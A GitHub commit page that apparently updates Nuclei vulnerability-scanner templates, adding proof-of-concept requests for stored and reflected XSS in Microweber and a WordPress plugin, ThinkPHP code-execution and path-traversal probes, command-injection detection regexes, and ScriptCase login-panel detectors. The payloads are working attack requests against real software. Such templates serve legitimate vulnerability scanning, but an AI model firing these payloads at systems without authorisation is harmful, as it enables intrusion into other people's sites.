up PoCs 2022-07-27

GhostTroops · Jul 27, 2022 · 7b6e69d · 7b6e69d
1 parent 004ebe1
commit 7b6e69d
Show file tree

Hide file tree

Showing 11 changed files with 274 additions and 10 deletions.
diff --git a/config/nuclei-templates/51pwn/CVE-2022-30525.yaml b/config/nuclei-templates/51pwn/CVE-2022-30525.yaml
@@ -28,5 +28,5 @@ requests:
       - type: regex
         part: body
         regex:
-          - '(uid=[^\n]+\\())'
+          - '(uid=\d+\([^\n]+\\())'
         condition: and
diff --git a/config/nuclei-templates/51pwn/Confluence_CVE-2022-26134.yaml b/config/nuclei-templates/51pwn/Confluence_CVE-2022-26134.yaml
@@ -79,7 +79,7 @@ requests:
         part: header
         name: uid
         regex:
-          - '(uid=[^\n\r\\]+)'
+          - '(uid=\d+\([^\n\r\\]+)'
           # - '(X-Confluence-Request-Time)'
       - type: regex
         part: header

diff --git a/config/nuclei-templates/51pwn/ThinkPhp.yaml b/config/nuclei-templates/51pwn/ThinkPhp.yaml
@@ -57,7 +57,6 @@ requests:
         GET /index.php?s={{myhref}}/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=2333 HTTP/1.1
         Host: {{Hostname}}
 
-
     req-condition: true
     stop-at-first-match: true
 
@@ -70,7 +69,7 @@ requests:
         condition: or
       - type: dsl
         dsl:
-          - 'status_code != 404'
+          - 'status_code != 404 && status_code != 301 && status_code != 302'
     iterate-all: true
     extractors:
       - type: regex
@@ -92,7 +91,7 @@ requests:
         Connection: close
         
       - |+
-        GET /index.php?s=index/\\think\Request/input&filter=var_dump&data=f7e0b956540676a129760a3eae309294 HTTP/1.1
+        GET /index.php?s=index/\think\Request/input&filter=var_dump&data=f7e0b956540676a129760a3eae309294 HTTP/1.1
         Host: {{Hostname}}
         Accept:*/*
         Pragma:no-cache
@@ -139,14 +138,14 @@ requests:
         Connection: close
 
       - |+
-        GET /index.php?s=my-show-id-\\x5C..\\x5CTpl\\x5C8edy\\x5CHome\\x5Cmy_1{~var_dump(md5(2333))}] HTTP/1.1
+        GET /index.php?s=my-show-id-\x5C..\x5CTpl\x5C8edy\x5CHome\x5Cmy_1{~var_dump(md5(2333))}] HTTP/1.1
         Host: {{Hostname}}
         Accept:*/*
         Pragma:no-cache
         Accept-Encoding:gzip, deflate
         Connection: close
       - |+
-        GET /index.php?s=index/\\think\\view\driver\Php/display&content=%3C?php%20var_dump(md5(2333));?%3E HTTP/1.1
+        GET /index.php?s=index/\think\view\driver\Php/display&content=%3C?php%20var_dump(md5(2333));?%3E HTTP/1.1
         Host: {{Hostname}}
         Accept:*/*
         Pragma:no-cache
@@ -171,7 +170,7 @@ requests:
         s=4e5e5d7364f443e28fbf0d3ae744a59a&_method=__construct&method&filter[]=var_dump
       # datetime.datetime.now().strftime("%Y_%m_%d")[2:]
       - |+
-        GET /index.php?s=my-show-id-\\x5C..\\x5CRuntime\\x5CLogs\\x5C{{substr(date("%Y-%M-%D"),2)}}.log HTTP/1.1
+        GET /index.php?s=my-show-id-\x5C..\x5CRuntime\x5CLogs\x5C{{substr(date("%Y-%M-%D"),2)}}.log HTTP/1.1
         Host: {{Hostname}}
         Accept:*/*
         Pragma:no-cache
@@ -187,7 +186,7 @@ requests:
       #     - 200
       - type: dsl
         dsl:
-          - 'status_code != 404'
+          - 'status_code != 404 && status_code != 301 && status_code != 302'
       - type: word
         part: body
         words:
@@ -228,7 +227,7 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - 'status_code != 404'
+          - 'status_code != 404 && status_code != 301 && status_code != 302'
       - type: regex
         part: body
         regex:

diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0921.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0921.yaml
@@ -0,0 +1,57 @@
+id: CVE-2022-0954
+
+info:
+  name: Microweber - Cross-site Scripting
+  author: amitj
+  severity: medium
+  description: |
+    Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.
+  reference:
+    - /~https://github.com/advisories/GHSA-8c76-mxv5-w4g8
+    - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0954
+    - /~https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2022-0954
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,xss,microweber
+
+requests:
+  - raw:
+      - |
+        POST /api/user_login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /api/save_option HTTP/2
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Referer: {{BaseURL}}/admin/view:shop/action:options
+
+        option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
+
+      - |
+        POST /module/ HTTP/2
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Referer: {{BaseURL}}/admin/view:shop/action:options
+
+        module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B
+
+    cookie-reuse: true
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2,"true")'
+          - contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder=\"Use default')
+          - 'contains(all_headers_3,"text/html")'
+          - 'status_code_3==200'
+        condition: and
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0963.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0963.yaml
@@ -0,0 +1,69 @@
+id: CVE-2022-0963
+
+info:
+  name: Microweber > 1.2.12 - Cross-Site Scripting
+  author: amit-jd
+  severity: medium
+  description: |
+    Microweber prior to 1.2.12 allows unrestricted upload of XML files, which malicious actors can exploit to cause a stored cross-site scripting attack.
+  reference:
+    - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/
+    - /~https://github.com/advisories/GHSA-q3x2-jvp3-wj78
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0963
+    - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2022-0963
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,xss,microweber,cms,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /api/user_login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /plupload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034
+        Referer: {{BaseURL}}admin/view:modules/load_module:files
+
+        -----------------------------59866212126262636974202255034
+        Content-Disposition: form-data; name="name"
+
+        {{randstr}}.xml
+        -----------------------------59866212126262636974202255034
+        Content-Disposition: form-data; name="chunk"
+
+        0
+        -----------------------------59866212126262636974202255034
+        Content-Disposition: form-data; name="chunks"
+
+        1
+        -----------------------------59866212126262636974202255034
+        Content-Disposition: form-data; name="file"; filename="blob"
+        Content-Type: application/octet-stream
+
+        <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>
+        -----------------------------59866212126262636974202255034--
+
+      - |
+        GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_3,"alert(document.domain)")'
+          - 'status_code_3==200'
+          - 'contains(body_2,"bytes_uploaded")'
+        condition: and
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1937.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1937.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-1937
+
+info:
+  name: Awin Data Feed <= 1.6 - Reflected Cross-Site Scripting
+  author: Akincibor,DhiyaneshDK
+  severity: medium
+  description: |
+    The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting.
+  reference:
+    - https://wpscan.com/vulnerability/eb40ea5d-a463-4947-9a40-d55911ff50e9
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1937
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-1937
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,wp-plugin,xss,wp,wordpress,authenticated,awin
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(all_headers_2, "text/html")'
+          - 'status_code_2 == 200'
+          - contains(body_2, 'colspan=\"2\"><script>alert(document.domain)</script></th>')
+        condition: and
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-2486.yaml b/config/nuclei-templates/cves/2022/CVE-2022-2486.yaml
@@ -10,6 +10,11 @@ info:
     - /~https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486
     - https://vuldb.com/?id.204537
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-2486
+    cwe-id: CWE-78
   metadata:
     shodan-query: http.title:"Wi-Fi APP Login"
     verified: "true"

diff --git a/config/nuclei-templates/cves/2022/CVE-2022-2487.yaml b/config/nuclei-templates/cves/2022/CVE-2022-2487.yaml
@@ -10,6 +10,11 @@ info:
     - /~https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487
     - https://vuldb.com/?id.204538
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-2487
+    cwe-id: CWE-78
   metadata:
     shodan-query: http.title:"Wi-Fi APP Login"
     verified: "true"

diff --git a/config/nuclei-templates/cves/2022/CVE-2022-2488.yaml b/config/nuclei-templates/cves/2022/CVE-2022-2488.yaml
@@ -10,6 +10,11 @@ info:
     - /~https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488
     - https://vuldb.com/?id.204539
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-2488
+    cwe-id: CWE-78
   metadata:
     shodan-query: http.title:"Wi-Fi APP Login"
     verified: "true"

diff --git a/config/nuclei-templates/exposed-panels/scriptcase/scriptcase-panel.yaml b/config/nuclei-templates/exposed-panels/scriptcase/scriptcase-panel.yaml
@@ -0,0 +1,41 @@
+id: scriptcase-panel
+
+info:
+  name: ScriptCase Panel Detect
+  author: Ricardo Maia (Brainfork)
+  severity: info
+  reference:
+    - https://www.scriptcase.com.br
+    - https://www.scriptcase.net
+  metadata:
+    verified: true
+    shodan-query: title:"ScriptCase"
+  tags: panel,scriptcase
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/devel/iface/"
+      - "{{BaseURL}}/scriptcase/devel/iface/"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '(?i)(ScriptCase)'
+          - '(?i)(NetMake)'
+          - '(?i)(Login)'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 2
+        regex:
+          - '(Vers&atilde;o|Version|Versão)\b.*\s(\d.*\d)'
diff --git a/config/nuclei-templates/exposed-panels/scriptcase/scriptcase-prod-login.yaml b/config/nuclei-templates/exposed-panels/scriptcase/scriptcase-prod-login.yaml
@@ -0,0 +1,41 @@
+id: scriptcase-prod-login
+
+info:
+  name: ScriptCase Production Environment Login
+  author: Ricardo Maia (Brainfork)
+  severity: info
+  reference:
+    - https://www.scriptcase.com.br
+    - https://www.scriptcase.net
+  metadata:
+    verified: true
+    shodan-query: title:"ScriptCase"
+  tags: panel,scriptcase
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/prod/lib/php/"
+      - "{{BaseURL}}/scriptcase/prod/lib/php/"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '(?i)(ScriptCase)'
+          - '(?i)(NetMake)'
+          - '(?i)(Login)'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 2
+        regex:
+          - '(Vers&atilde;o|Version|Versão)\b.*\s(\d.*\d)'